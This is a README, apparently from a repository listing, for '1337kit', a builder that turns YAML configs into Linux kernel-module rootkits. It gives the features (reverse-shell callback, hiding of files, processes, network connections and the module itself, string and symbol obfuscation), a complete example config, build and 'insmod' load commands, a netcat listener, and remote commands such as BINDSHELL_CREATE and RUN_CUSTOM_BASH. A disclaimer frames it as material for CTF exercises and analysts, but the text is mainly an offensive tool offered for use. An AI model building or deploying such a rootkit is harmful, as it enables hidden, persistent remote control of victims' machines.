1337kit
64-bit LKM Rootkit builder based on yaml prescription. Working on 5.15.5 kernel
Install / Use
/learn @lukasbalazik/1337kitREADME
1337kit - LKM Rootkit Builder
About project
1337kit is 64-bit LKM Rootkit builder based on yaml prescription
Fully tested on: Linux 5.11.0-34-generic 20.04.1-Ubuntu x86_64 x86_64 x86_64 GNU/Linux
DISCLAIMER: FOR EDUCATIONAL AND INFORMATIONAL PURPOSES ONLY
This project is for malware analysts and for creator of CTF or cyber security exercises, with this builder you can build your custom rootkit for your exercise
I do not take any responsibility for usage of this project
Rootkit Features
- RevShell based connector
- Hiding dents (files, files prefixes, process ids)
- Hiding connections based on Ports in TCP Connection (IPv4 and IPv6)
- Hiding connections based on IP in TCP Connection (IPv4)
- Hiding connections based on Ports in UDP Connection (IPv4 and IPv6)
- Hiding connections based on IP in UDP Connection (IPv4)
- Spawning scripts to user-space
- Hiding module from module list
Builder Features
- Files and functions obfuscation
- Strings encryption
- Verbose building
Installation
Builder requirements:
$ pip3 install -r requirements.txt
Install requirements for building LKM:
sudo apt-get install build-essential linux-headers-$(uname -r)
Usage
You have to create your yaml prescription for custom rootkit, Example of full prescription (every option can be omitted):
hideme: true
connector:
ip: "127.0.0.1"
port: "8080"
hide_dent: # Here you can put all your files, directories and process id you want to hide from user
- "91746"
- "1337test_"
hide_tcp_port:
- "8080"
- "1337"
hide_tcp_ip:
- "127.0.0.1"
- "8.8.8.8"
hide_udp_port:
- "8080"
- "1337"
hide_udp_ip:
- "127.0.0.1"
- "8.8.8.8"
shells:
- "sleep 1000"
After you create your yaml just run the builder.py
$ python3 builder.py --help
usage: builder.py [-h] -c CONFIG [-v] [-o] [-s]
Generate rootkit from yaml prescription
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
Yaml prescription file
-v, --verbose Debug Mode
-o, --obfuscate_files
Enable rootkit symbols obfuscation
-s, --obfuscate_strings
Enable rootkit strings obfuscation
And rootkit will be created.
another way to execute your hiding or shell script is connector, if you enable your connector, rev-sell connection is created to your defined IP and Port, after this it will try open connection every x second. After connection is opened multiple commands can be send:
- HIDEME
- SHOWME
- HIDE_DENT
- SHOW_HIDDEN_DENT
- HIDE_TCP_PORT
- SHOW_HIDDEN_TCP_PORT
- HIDE_TCP_IP
- SHOW_HIDDEN_TCP_IP
- HIDE_UDP_PORT
- SHOW_HIDDEN_UDP_PORT
- HIDE_UDP_IP
- SHOW_HIDDEN_UDP_IP
- BINDSHELL_CREATE
- RUN_CUSTOM_BASH
Additional Information
tcp_seq_show.c file in hooker is pretty much same as udp_seq_show, but i split it if anyone need some own modification for either of protocols
Future Features
- TCP and UDP IPv6 hiding
- AES Encryption support
Examples
$ python3 builder.py --config testfiles/config.yml
$ sudo insmod project.ko
$ nc -lvnp 1337
Listening on 0.0.0.0 8080
Connection received on 127.0.0.1 39040
RUN_CUSTOM_BASH sleep 1000
Related Skills
healthcheck
348.5kHost security hardening and risk-tolerance configuration for OpenClaw deployments
prose
348.5kOpenProse VM skill pack. Activate on any `prose` command, .prose files, or OpenProse mentions; orchestrates multi-agent workflows.
Writing Hookify Rules
109.1kThis skill should be used when the user asks to "create a hookify rule", "write a hook rule", "configure hookify", "add a hookify rule", or needs guidance on hookify rule syntax and patterns.
Agent Development
109.1kThis skill should be used when the user asks to "create an agent", "add an agent", "write a subagent", "agent frontmatter", "when to use description", "agent examples", "agent tools", "agent colors", "autonomous agent", or needs guidance on agent structure, system prompts, triggering conditions, or agent development best practices for Claude Code plugins.
